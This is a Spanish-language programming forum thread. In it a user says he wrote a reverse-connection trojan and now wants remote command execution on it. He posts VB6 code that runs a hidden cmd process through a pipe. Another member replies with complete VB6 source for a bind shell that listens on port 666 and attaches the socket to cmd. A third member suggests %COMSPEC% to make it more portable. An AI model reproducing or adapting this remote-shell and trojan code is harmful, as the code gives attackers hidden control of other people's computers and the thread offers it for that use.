Autor
|
Tema: Ayuda con CMD Pipe vb6 (Leído 10,611 veces)
|
hepy_92
Desconectado
Mensajes: 130
|
hola hace unos años cree un troyano de multiconexion inversa ahora lo retome ya que lo quiero volver a usar y estoy en proceso para poder enviar comandos a la cmd remota y poder volver a recibir lo que pasa (EJ: pongo dir C:\ y me devuelve el resultado, enlistando los archivos en C:\) para esto encontre este codigo de cmd pipe 'Redirects output from console program to textbox. 'Requires two textboxes and one command button. 'Set MultiLine property of Text2 to true. ' 'Original bcx version of this program was made by ' dl <dl@tks.cjb.net> 'VB port was made by Jernej Simoncic <jernej@isg.si> 'Visit Jernejs site at http://www2.arnes.si/~sopjsimo/ ' 'Note: don't run plain DOS programs with this example 'under Windows 95,98 and ME, as the program freezes when 'execution of program is finnished.
Option Explicit Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO) Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type
Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadId As Long End Type
Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Byte hStdInput As Long hStdOutput As Long hStdError As Long End Type
Private Type OVERLAPPED ternal As Long ternalHigh As Long offset As Long OffsetHigh As Long hEvent As Long End Type
Private Const STARTF_USESHOWWINDOW = &H1 Private Const STARTF_USESTDHANDLES = &H100 Private Const SW_HIDE = 0 Private Const EM_SETSEL = &HB1 Private Const EM_REPLACESEL = &HC2
Private Sub Command1_Click() Command1.Enabled = False Redirect Text1.Text, Text2 Command1.Enabled = True End Sub Private Sub Form_Load() Text1.Text = "ping" End Sub Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer) If Command1.Enabled = False Then Cancel = True End Sub
Sub Redirect(cmdLine As String, objTarget As Object) Dim i%, t$ Dim pa As SECURITY_ATTRIBUTES Dim pra As SECURITY_ATTRIBUTES Dim tra As SECURITY_ATTRIBUTES Dim pi As PROCESS_INFORMATION Dim sui As STARTUPINFO Dim hRead As Long Dim hWrite As Long Dim bRead As Long Dim lpBuffer(1024) As Byte pa.nLength = Len(pa) pa.lpSecurityDescriptor = 0 pa.bInheritHandle = True pra.nLength = Len(pra) tra.nLength = Len(tra)
If CreatePipe(hRead, hWrite, pa, 0) <> 0 Then sui.cb = Len(sui) GetStartupInfo sui sui.hStdOutput = hWrite sui.hStdError = hWrite sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES sui.wShowWindow = SW_HIDE If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, Null, vbNullString, sui, pi) <> 0 Then SetWindowText objTarget.hwnd, "" Do Erase lpBuffer() If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) Then SendMessage objTarget.hwnd, EM_SETSEL, -1, 0 SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0) DoEvents Else CloseHandle pi.hThread CloseHandle pi.hProcess Exit Do End If CloseHandle hWrite Loop CloseHandle hRead End If End If End Sub para enviar comandos como cd o dir hay que anteponer un "cmd /k" (Ej: cmd /k dir C:\) no me pregunten por que (si alguien me puede explicar porque hay que hacerlo se agradece jajaja) pero bueno el problema es que al enviar un comando como un dir o cd, me sale este error: Error '9' en tiempo de ejecucion: el subindice esta fuera del intervalo
ayuda porfavor! gracias de antemano
|
|
|
En línea
|
|
|
|
cobein
|
Hay una manera de hacer esto correctamente y es conectar el stdio a un socket, despues si tengo un rato lo hago y lo posteo.
|
|
|
En línea
|
|
|
|
hepy_92
Desconectado
Mensajes: 130
|
ok se agradeceria mucho! alguna otra idea? gracias
|
|
|
En línea
|
|
|
|
hepy_92
Desconectado
Mensajes: 130
|
como saber que timer es el que esta "fuera del intervalo"? y que significa que esta fuera del intervalo? perdon si es algo noob mi pregunta pero hace mucho que no toco el vb 6 Error '9' en tiempo de ejecucion: el subindice esta fuera del intervalo gracias
|
|
|
En línea
|
|
|
|
shaggikpo
Desconectado
Mensajes: 30
|
en que linea exactamente se produce el error?
|
|
|
En línea
|
|
|
|
cobein
|
Bien, aca esta el ejemplo '--------------------------------------------------------------------------------------- ' Module : mMS ' DateTime : 12/13/2009 20:16 ' Author : Cobein ' Mail : cobein27@hotmail.com ' WebPage : http://www.advancevb.com.ar ' Purpose : Remote shell ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' Reference : NGS - Writing small shellcode paper ' ' History : 12/13/2009 First Cut.................................................... '--------------------------------------------------------------------------------------- Option Explicit
Private Const INFINITE As Long = &HFFFF Private Const SOCK_STREAM As Long = 1 Private Const AF_INET As Long = 2 Private Const IPPROTO_TCP As Long = 6 Private Const STARTF_USESTDHANDLES As Long = &H100 Private Const STARTF_USESHOWWINDOW As Long = &H1
Private Const WSADESCRIPTION_LEN As Long = 257 Private Const WSASYS_STATUS_LEN As Long = 129
Public Type WSAData wVersion As Integer wHighVersion As Integer szDescription As String * WSADESCRIPTION_LEN szSystemStatus As String * WSASYS_STATUS_LEN iMaxSockets As Integer iMaxUdpDg As Integer lpVendorInfo As Long End Type
Public Type sockaddr_in sin_family As Integer sin_port As Integer sin_addr As Long sin_zero(1 To 8) As Byte End Type
Private Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type
Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadId As Long End Type
Private Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Byte hStdInput As Long hStdOutput As Long hStdError As Long End Type
Private Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVR As Long, lpWSAD As WSAData) As Long Private Declare Function WSACleanup Lib "ws2_32.dll" () As Long Private Declare Function bind Lib "ws2_32.dll" (ByVal s As Long, ByRef name As sockaddr_in, ByRef namelen As Long) As Long Private Declare Function listen Lib "ws2_32.dll" (ByVal s As Long, ByVal backlog As Long) As Long Private Declare Function accept Lib "ws2_32.dll" (ByVal s As Long, ByRef addr As sockaddr_in, ByRef addrlen As Long) As Long Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long Private Declare Function htons Lib "wsock32.dll" (ByVal hostshort As Long) As Integer Private Declare Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal lType As Long, ByVal protocol As Long, ByRef lpProtocolInfo As Any, ByRef g As Any, ByVal dwFlags As Long) As Long Private Declare Function closesocket Lib "wsock32.dll" (ByVal s As Long) As Long
Public Sub Main() Dim lSock As Long Dim tSA As sockaddr_in Dim tWD As WSAData Dim lHandle As Long Const PORT As Long = 666 If WSAStartup(&H101, tWD) = 0 Then lSock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, ByVal 0&, ByVal 0&, ByVal 0&) If Not lSock = -1 Then With tSA .sin_family = 2 .sin_port = htons(PORT) End With If bind(lSock, tSA, Len(tSA)) = 0 Then If listen(lSock, 0&) = 0 Then lHandle = accept(lSock, tSA, Len(tSA)) Dim tSTARTUPINFO As STARTUPINFO Dim tPROCESS_INFORMATION As PROCESS_INFORMATION Dim tSECURITY_ATTRIBUTES As SECURITY_ATTRIBUTES tSECURITY_ATTRIBUTES.nLength = Len(tSECURITY_ATTRIBUTES) With tSTARTUPINFO .cb = Len(tSTARTUPINFO) .dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW .hStdInput = lHandle .hStdOutput = lHandle .hStdError = lHandle End With If CreateProcessA(vbNullString, "cmd", _ tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _ 0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then Call WaitForSingleObject(tPROCESS_INFORMATION.hProcess, INFINITE) End If End If End If Call closesocket(lHandle) End If
Call WSACleanup End If End Sub Algunas cosas para que tengan en cuenta. 1- el codigo se va a freezar a la espera de una conexión 2- hay muchas estructuras que se pueden obviar pero las deje pora que el ejemplo sea mas claro. 3- se pueden conectar usando telnet (open localhost 666) en Vista y no se si en 7 telnet no esta instalado por defecto.
|
|
|
En línea
|
|
|
|
Karcrack
Desconectado
Mensajes: 2.416
Se siente observado ¬¬'
|
Muy bonito el code Solo una cosa: If CreateProcessA(vbNullString, "cmd", _ tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _ 0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then Envez de 'cmd' creo que seria mejor '%COMSPEC%'
|
|
|
En línea
|
|
|
|
|
hepy_92
Desconectado
Mensajes: 130
|
no entendi en absoluto lo qe postiaste :S disculpa mi ignorancia soy newbie... pero qe es eso?
|
|
|
En línea
|
|
|
|
Karcrack
Desconectado
Mensajes: 2.416
Se siente observado ¬¬'
|
¿En que PC no seria cmd ? Cualquier version de W$ anterior a XP De todos modos, variables de entorno ftw!!!
|
|
|
En línea
|
|
|
|
|
|